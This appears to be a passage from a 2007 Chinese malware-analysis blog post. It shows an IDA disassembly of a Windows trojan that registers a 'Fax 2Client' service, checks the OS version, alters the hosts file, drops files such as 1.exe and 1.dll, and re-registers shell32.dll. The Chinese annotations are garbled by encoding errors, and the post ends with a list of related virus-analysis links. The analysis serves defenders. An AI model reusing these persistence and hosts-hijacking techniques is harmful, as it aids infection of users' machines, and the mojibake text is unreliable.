.text:004123C2                  push     offset s_Fax2client ; "Fax 2Client"
.text:004123C7                  mov      ecx, offset unk_4181D8
.text:004123CC                  call     sub_4029A0
.text:004123CC
.text:004123D1                  push     offset loc_412FD0
.text:004123D6                  call     _atexit
.text:004123D6
.text:004123DB                  pop      ecx
.text:004123DC                  retn
.text:004123DC
.text:0041259D                  align 10h
.text:004125A0                  push     22h
.text:004125A2                  push     offset s_SystemCurre_0 ; "SYSTEM\\CurrentControlSet\\Services\\"
.text:004125A7                  mov      ecx, offset unk_41837C
.text:004125AC                  call     sub_4029A0
.text:004125AC
.text:004125B1                  push     offset loc_4132A0
.text:004125B6                  call     _atexit
.text:004125B6
.text:004125BB                  pop      ecx
.text:004125BC                  retn
.text:004125BC
.rdata:004145FC s_SystemCurre_0 db 'SYSTEM\CurrentControlSet\Services\',0

//ע��Ϊms_2fax�ķ��ʾ��ΪFax 2Client

.rdata:00414680                  unicode 0, <\>,0
.rdata:00414684 s_Unknown        db 'Unknown',0           ; DATA XREF: sub_4057D0+15C o
.rdata:00414684                                          ; sub_405940+4E o
.rdata:0041468C ; char s_WindowsMe[]
.rdata:0041468C s_WindowsMe      db 'Windows Me',0        ; DATA XREF: sub_4034D0:loc_40362E o
.rdata:0041468C                                          ; sub_4057D0+B2 o
.rdata:00414697                  align 4
.rdata:00414698 ; char s_Windows98[]
.rdata:00414698 s_Windows98      db 'Windows 98',0        ; DATA XREF: sub_4034D0:loc_403601 o
.rdata:00414698                                          ; sub_4057D0:loc_405866 o
.rdata:004146A3                  align 4
.rdata:004146A4 ; char s_Windows98Seco[]
.rdata:004146A4 s_Windows98Seco db 'Windows 98 Second Edition',0
.rdata:004146A4                                          ; DATA XREF: sub_4034D0:loc_4035D4 o
.rdata:004146A4                                          ; sub_4057D0+87 o
.rdata:004146BE                  align 10h
.rdata:004146C0 ; char s_Windows95[]
.rdata:004146C0 s_Windows95      db 'Windows 95',0        ; DATA XREF: sub_4034D0:loc_4035A7 o
.rdata:004146C0                                          ; sub_4057D0:loc_405827 o
.rdata:004146CB                  align 4
.rdata:004146CC ; char s_Windows95Osr2[]
.rdata:004146CC s_Windows95Osr2 db 'Windows 95 OSR2',0   ; DATA XREF: sub_4034D0:loc_40357A o
.rdata:004146CC                                          ; sub_4057D0+48 o

//�жϲ��ϵͳ�汾��NT�ںˣ��з��

.rdata:004146DC s_VectorTooL db 'vector too long',0 ; DATA XREF: .text:00402F5A o
.rdata:004146EF                  align 10h
.rdata:004146F0 ; char ProcName[]
.rdata:004146F0 ProcName         db 'SHGetFolderPathA',0 ; DATA XREF: sub_403190+33 o
.rdata:00414701                  align 4
.rdata:00414704 ; char LibFileName[]
.rdata:00414704 LibFileName      db 'shell32.dll',0       ; DATA XREF: sub_403190+F o
.rdata:00414710 asc_414710:                              ; DATA XREF: sub_4034D0+28A o
.rdata:00414710                  unicode 0, <">,0
.rdata:00414714 s_US             db ' /u /s "',0          ; DATA XREF: sub_4034D0+267 o
.rdata:0041471D                  align 10h
.rdata:00414720 s_S              db ' /s "',0             ; DATA XREF: sub_4034D0+25E o
.rdata:00414726                  align 4
.rdata:00414728 s_SystemRegsvr3 db '\system\regsvr32.exe',0 ; DATA XREF: sub_4034D0+1DB o
.rdata:0041473D                  align 10h
.rdata:00414740 s_Regsvr32_exe   db '\regsvr32.exe',0     ; DATA XREF: sub_4034D0+17E o
.rdata:0041474E                  align 10h
.rdata:00414750 s_2810bb9d466d   db '2810BB9D466D}',0     ; DATA XREF: sub_403940+78 o
.rdata:0041475E                  align 10h
.rdata:00414760 s_01de82f0       db '{01DE82F0',0         ; DATA XREF: sub_403940+68 o
.rdata:0041476A                  align 4
.rdata:0041476C s_Y:                                     ; DATA XREF: sub_4040A0+CA o
.rdata:0041476C                  unicode 0, ,0
.rdata:00414770 s_S_0:                                   ; DATA XREF: sub_4040A0+60 o
.rdata:00414770                  unicode 0, ,0
.rdata:00414774 s_1_rm           db '1.rm',0              ; DATA XREF: sub_4040A0+730 o
.rdata:00414779                  align 4
.rdata:0041477C s_1_txt          db '1.txt',0             ; DATA XREF: sub_4040A0+64B o
.rdata:00414782                  align 4
.rdata:00414784 s_1_bmp          db '1.bmp',0             ; DATA XREF: sub_4040A0+4BB o
.rdata:0041478A                  align 4
.rdata:0041478C s_1_exe          db '1.exe',0             ; DATA XREF: sub_4040A0+326 o
.rdata:0041478C                                          ; sub_4040A0+566 o
.rdata:00414792                  align 4
.rdata:00414794 s_1_dll          db '1.dll',0             ; DATA XREF: sub_4040A0+1C5 o
.rdata:00414794                                          ; sub_4040A0+27E o
.rdata:00414794                                          ; sub_4040A0+3D9 o
.rdata:0041479A                  align 4
.rdata:0041479C s_Usb8028x       db 'usb8028x',0          ; DATA XREF: .text:00412B40 o
.rdata:004147A5                  align 4
.rdata:004147A8 s_Usb8028        db 'usb8028',0           ; DATA XREF: .text:00412B60 o
.rdata:004147B0 s_ListTooLon db 'list too long',0 ; DATA XREF: sub_404FE0+2E o
.rdata:004147C1                  align 4
.rdata:004147C4 s_Hosts          db '\hosts',0            ; DATA XREF: sub_405190+CD o
.rdata:004147CB                  align 4
.rdata:004147CC s_System32Drive db '\System32\drivers\etc\hosts',0
.rdata:004147CC                                          ; DATA XREF: sub_405190+9A o
.rdata:004147E8 ; char s_WT[]
.rdata:004147E8 s_WT             db 'w+t',0               ; DATA XREF: sub_4053A0:loc_4055B0 o
.rdata:004147EC ; char s_Rt[]
.rdata:004147EC s_Rt             db 'rt',0                ; DATA XREF: sub_4053A0:loc_405441 o
.rdata:004147EF                  align 10h
.rdata:004147F0 ; char s_S_1[]
.rdata:004147F0 s_S_1            db '%s',0                ; DATA XREF: sub_4056F0+24 o
.rdata:004147F0                                          ; sub_405760+24 o
.rdata:004147F3                  align 4
.rdata:004147F4 off_4147F4       dd offset sub_405740     ; DATA XREF: sub_4056F0+12 o
.rdata:004147F4                                          ; .text:loc_405730 o
.rdata:004147F4                                          ; sub_405740+8 o
.rdata:004147F8 ; char s_S_sys[]
.rdata:004147F8 s_S_sys          db '%s.sys',0            ; DATA XREF: sub_4056F0+C o
.rdata:004147F8                                          ; sub_405760+C o
.rdata:004147FF                  align 10h
.rdata:00414800 off_414800       dd offset sub_4057B0     ; DATA XREF: sub_405760+12 o
.rdata:00414800                                          ; .text:loc_4057A0 o
.rdata:00414800                                          ; sub_4057B0+8 o
.rdata:00414804 s_WindowsServer db 'Windows Server 2003 family',0
.rdata:00414804                                          ; DATA XREF: sub_4057D0+147 o
.rdata:0041481F                  align 10h
.rdata:00414820 s_WindowsXp      db 'Windows XP',0        ; DATA XREF: sub_4057D0+12D o
.rdata:0041482B                  align 4
.rdata:0041482C s_Windows2000    db 'Windows 2000',0      ; DATA XREF: sub_4057D0+113 o
.rdata:00414839                  align 4
.rdata:0041483C s_WindowsNt4_0   db 'Windows NT 4.0',0    ; DATA XREF: sub_4057D0+F1 o
.rdata:0041484B                  align 4
.rdata:0041484C s_WindowsNt3_51 db 'Windows NT 3.51',0   ; DATA XREF: sub_4057D0+D7 o

//�жϲ��ϵͳ��ͣ��NT�ں�ϵͳ��д��޸�host�ļ��ƶ��洢�豸д��5��ļ��ע��shell32.dll

���� 鿴��

һ��ͼƬ

renlangliu — 2007-05-24 21:28

���� 鿴��

��ȥ¥��

[������]red pig

[ԭ��]dmecvcm.exe��iywdqdf.exe��kocmbcd.exe��autorun.infרɱ����

[ת��]���ݻָ�Ӳ�̿���ȫ���� (ͼ)

[ת��]PE�ļ��ṹʾ��ͼ

[ԭ��]���Բ����������棺winfx32.exe/winnt.bat

[ԭ��]�����������棺ws2ifsl.sys/avp.exe/tf6sound.dll

[ԭ��]����������text.exe(�Ѹ���)

[ԭ��]������qrypz.exeǳ��

FP30SVR.exe/mshtmlsed.exe/player.dll/inject.DLL/ser.exe/play.dll/

һ��ͼƬ

[��]red pig

[ԭ��]dmecvcm.exe��iywdqdf.exe��kocmbcd.exe��autorun.infרɱ��

[ת��]��ݻָ�Ӳ�̿��ȫ�� (ͼ)

[ԭ��]��Բ��棺winfx32.exe/winnt.bat

[ԭ��]��棺ws2ifsl.sys/avp.exe/tf6sound.dll

[ԭ��]��text.exe(�Ѹ��)

[ԭ��]��qrypz.exeǳ��